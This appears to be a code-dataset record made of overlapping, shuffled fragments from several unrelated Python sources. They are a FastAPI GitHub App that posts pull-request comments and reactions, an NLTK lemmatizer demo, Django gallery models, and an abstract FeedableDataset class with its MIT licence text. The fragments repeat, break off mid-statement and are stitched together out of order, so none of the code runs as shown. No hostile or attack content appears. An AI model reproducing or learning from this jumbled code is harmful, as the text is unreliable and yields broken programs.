ActionIn): gh = 
login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction')", "repository: str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def", "GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return", "if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content:", "return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue =", "def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number )", "number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\")", ") return \"Post Success\", 200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(),", "None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app", "from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if", "BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY", "@property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh =", "pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = 
os.environ.get('APP_IDENTIFIER', None) if not", "ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest from pydantic import BaseModel", "GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app =", "\"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh,", "import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY:", "issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def", "GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App", "return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application not setup", "raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404,", "200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post(" ]
[ "WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\"", "#lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\"))", "print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb", "from nltk.stem import WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) '''", "print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas", "= WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective,", "actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\")) print(lemmatizer.lemmatize(\"run\", pos=\"v\")) print(lemmatizer.lemmatize(\"run\"))", "give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\")) print(lemmatizer.lemmatize(\"run\",", "''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back actual", "nltk.stem import WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) 
print(lemmatizer.lemmatize(\"python\")) ''' #default", "= verb #lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\"))", "back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\", pos=\"a\")) print(lemmatizer.lemmatize(\"run\", pos=\"v\"))", "lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" =", "print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back", "adjective, \"v\" = verb #lemmas give back actual words, usually better then stemmers", "\"v\" = verb #lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\",", "#\"a\" = adjective, \"v\" = verb #lemmas give back actual words, usually better", "import WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun)", "= adjective, \"v\" = verb #lemmas give back actual words, usually better then", "pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back actual words, usually", "print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give", "''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\" = adjective, \"v\" =", "WordNetLemmatizer lemmatizer = WordNetLemmatizer() ''' print(lemmatizer.lemmatize(\"cacti\")) print(lemmatizer.lemmatize(\"geese\")) print(lemmatizer.lemmatize(\"rocks\")) 
print(lemmatizer.lemmatize(\"python\")) ''' #default pos=\"n\"(noun) #\"a\"", "verb #lemmas give back actual words, usually better then stemmers print(lemmatizer.lemmatize(\"better\", pos=\"a\")) print(lemmatizer.lemmatize(\"best\",", "#default pos=\"n\"(noun) #\"a\" = adjective, \"v\" = verb #lemmas give back actual words," ]
[ "location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category =", "image belongs to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image =", "slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model):", "# one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one", "return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return", "= models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location", "reverse from django.db import models # Create your models here class Location(models.Model): name", "def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE)", "Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category", "belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to", "to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to =", "models # Create your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self):", "= models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name= models.CharField(max_length=200) description", "Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return 
self.name def get_absolute_url(self):", "= models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE)", "location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name=", "models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model):", "import models # Create your models here class Location(models.Model): name = models.CharField(max_length=60) def", "from django.urls import reverse from django.db import models # Create your models here", "Create your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name", "def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs", "= models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug])", "name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def get_absolute_url(self): return", "# Create your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return", "a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single", "return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one", "your models here class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class", "get_absolute_url(self): return 
reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to", "single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category", "name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug", "return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a", "import reverse from django.db import models # Create your models here class Location(models.Model):", "# one image belongs to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300)", "= models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug =", "models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class", "class Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name =", "self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image", "one image belongs to a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image", "self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name", "reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single", "here class 
Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name", "image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs", "Location(models.Model): name = models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200)", "category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def get_absolute_url(self):", "to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a", "models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) #", "models.CharField(max_length=60) def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True)", "django.urls import reverse from django.db import models # Create your models here class", "single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def", "django.db import models # Create your models here class Location(models.Model): name = models.CharField(max_length=60)", "__str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self):", "category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name= models.CharField(max_length=200)", "models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True) def get_absolute_url(self): return reverse('gallery_detail',args=[self.id])", "belongs to a 
single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to", "one image belongs to a single location category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image", "class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def", "def __str__(self): return self.name class Category(models.Model): name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def", "from django.db import models # Create your models here class Location(models.Model): name =", "models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location =", "__str__(self): return self.name def get_absolute_url(self): return reverse('gallery_list',args=[self.slug]) class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) #", "a single category name= models.CharField(max_length=200) description = models.TextField(max_length=300) image = models.ImageField(upload_to = 'articles/',blank=True)", "models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category name= models.CharField(max_length=200) description =", "class Image(models.Model): location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location", "name = models.CharField(max_length=200) slug = models.SlugField(unique=True) def __str__(self): return self.name def get_absolute_url(self): return" ]
[ "as inout :param queue_name: The name of the queue where to put the", "FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\"", "it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\"", "fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature],", "session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder", "diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER =", "sure the item respects the required protofields and casts/pads the item accordingly \"\"\"", "Len - Converting and flattening # Scalar - Just converting # Fixed Len", "2019 - <NAME> # # NOTICE: Permission is hereby granted, free of charge,", "files (the \"Software\"), # to deal in the Software without restriction, including without", "np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name, item,", "# Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic", "session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session):", "Software without restriction, including without limitation the # rights to use, copy, modify,", "substantial portions of the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class", "self.proto_fields, 'Feature %s is not in proto fields.' 
% feature proto_field = self.proto_fields[feature]", "proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs):", "item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) #", "the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or #", ":param cluster_config: Optional. If set, the cluster configuration will be used for distributed", "right dtype for feature in item: assert feature in self.proto_fields, 'Feature %s is", "isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting and flattening #", "__init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the", "distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config", "Fixed Len - Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field,", "encountered. 
:return: A tornado.concurrent.Future that will be set with the results when they", "# # NOTICE: Permission is hereby granted, free of charge, to any person", "and casts/pads the item accordingly \"\"\" # Checking all features in items, padding", "been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator", "# ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding data inside", "class responsible for feeding data inside a model \"\"\" from abc import ABCMeta,", "- Just converting # Fixed Len - Padding and converting if proto_field.dtype is", "persons to whom the Software is # furnished to do so, subject to", "publish, distribute, sublicense, and/or # sell copies of the Software, and to permit", "\"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is closing", "self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return", "conditions: # # The above copyright notice and this permission notice shall be", "session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset", "= dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will", "\"\"\" Computes the outputs of a name using item as inout :param queue_name:", "# Copyright 2019 - <NAME> # # NOTICE: Permission is hereby granted, free", "obtaining # a copy of this software and associated documentation files (the \"Software\"),", "to permit persons to whom the Software is # furnished to do so,", "Len - Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField):", "@property def can_support_iterator(self): \"\"\" Determines if the 
dataset can support an iterator or", "the Software without restriction, including without limitation the # rights to use, copy,", "# to deal in the Software without restriction, including without limitation the #", "item :param item: A dictionary with the fields required for that queue :param", "for that queue :param retry_on_failure: Boolean that indicates to retry querying from the", "# ============================================================================== # Copyright 2019 - <NAME> # # NOTICE: Permission is hereby", "that will be set with the results when they become available \"\"\" raise", "any person obtaining # a copy of this software and associated documentation files", "set, the cluster configuration will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder", "= np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name,", ":param retry_on_failure: Boolean that indicates to retry querying from the model if an", "of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional. If set,", "dataset :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise", "\"\"\" Determines if the dataset can support an iterator or if it is", "Permission is hereby granted, free of charge, to any person obtaining # a", "for distributed training. 
:type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder", "so, subject to the following conditions: # # The above copyright notice and", "get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item", "model \"\"\" from abc import ABCMeta, abstractmethod import logging import numpy as np", "the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if", "class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\" def __init__(self,", "- Abstract class responsible for feeding data inside a model \"\"\" from abc", ":return: A tornado.concurrent.Future that will be set with the results when they become", "dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be", "name using item as inout :param queue_name: The name of the queue where", "NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has been started \"\"\"", "the proto-fields and generation methods :param cluster_config: Optional. If set, the cluster configuration", "continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] =", "required protofields and casts/pads the item accordingly \"\"\" # Checking all features in", "to use. 
:type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\"", "the right dtype for feature in item: assert feature in self.proto_fields, 'Feature %s", "proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] =", "to the following conditions: # # The above copyright notice and this permission", "NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args,", "dataset (and its iterator) :param session: The TensorFlow session to use. :type session:", "Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the", ":param item: A dictionary with the fields required for that queue :param retry_on_failure:", "(RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset", "portions of the Software. 
# ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible", "cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default", "restriction, including without limitation the # rights to use, copy, modify, merge, publish,", "data inside a model \"\"\" from abc import ABCMeta, abstractmethod import logging import", "this software and associated documentation files (the \"Software\"), # to deal in the", "def initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param session: The", "\"\"\" Determines if the dataset has been started \"\"\" return self._is_started @property def", "initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param session: The TensorFlow", "The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def", "item: A dictionary with the fields required for that queue :param retry_on_failure: Boolean", "(and its iterator) :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session", "and generation methods :param cluster_config: Optional. If set, the cluster configuration will be", "tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item", "\"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError()", "\"Software\"), # to deal in the Software without restriction, including without limitation the", "Software is # furnished to do so, subject to the following conditions: #", "cluster_config: Optional. 
If set, the cluster configuration will be used for distributed training.", "self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can support an iterator", "self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) #", "a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder:", "cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features", "dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has", "is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\"", "dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config:", "initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is", "VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta):", "an iterator or if it is a remote (RPC) dataset \"\"\" raise NotImplementedError()", "\"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {}", "support an iterator or if it is a remote (RPC) dataset \"\"\" raise", "its iterator) :param session: The TensorFlow session to use. 
:type session: tensorflow.python.client.session.Session \"\"\"", "to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting", "object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor", "the dataset (and its iterator) :param session: The TensorFlow session to use. :type", "Var Len - Converting and flattening # Scalar - Just converting # Fixed", "self.default_features = {} # Will be used as default if features are missing", "iterator or if it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property", "not in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to", "converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten()", "elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature],", "Boolean that indicates to retry querying from the model if an error is", "\"\"\" This object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None):", "in items, padding them and converting them to the right dtype for feature", "Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can support", "is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized @property def", "A dictionary with the fields required for that queue :param retry_on_failure: Boolean that", "dtype for feature in item: assert feature in self.proto_fields, 'Feature %s is not", "permission notice shall be included in all # copies or substantial portions of", "Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable", "software and 
associated documentation files (the \"Software\"), # to deal in the Software", "# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell", "of the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for", "diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object", "the item respects the required protofields and casts/pads the item accordingly \"\"\" #", "person obtaining # a copy of this software and associated documentation files (the", "proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return", "notice and this permission notice shall be included in all # copies or", "TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self,", "has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the", "padding them and converting them to the right dtype for feature in item:", "queue :param retry_on_failure: Boolean that indicates to retry querying from the model if", "isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod", "raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has been started", "to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of", "= None self._is_started = False self._is_initialized = False self._is_closing = False def __del__(self):", "containing the proto-fields and generation methods :param cluster_config: Optional. 
If set, the cluster", "abc import ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import", "self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default if", "*args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self,", "TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args,", "False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self):", "If set, the cluster configuration will be used for distributed training. :type dataset_builder:", "@property def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return self._is_closing", "and to permit persons to whom the Software is # furnished to do", "This object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\"", "the following conditions: # # The above copyright notice and this permission notice", "SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\"", "they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook", "retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using item as inout", "# furnished to do so, subject to the following conditions: # # The", "import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from", "the Software, and to permit persons to whom the Software is # furnished", "to put the item :param item: A dictionary with the fields required for", "self.dataset_builder = dataset_builder self.cluster_config = 
cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} #", "import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__)", "False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close()", "name of the queue where to put the item :param item: A dictionary", "responsible for feeding data inside a model \"\"\" from abc import ABCMeta, abstractmethod", "used as default if features are missing self.session = None self.iterator = None", "to do so, subject to the following conditions: # # The above copyright", "def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod", "item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self,", "all # copies or substantial portions of the Software. 
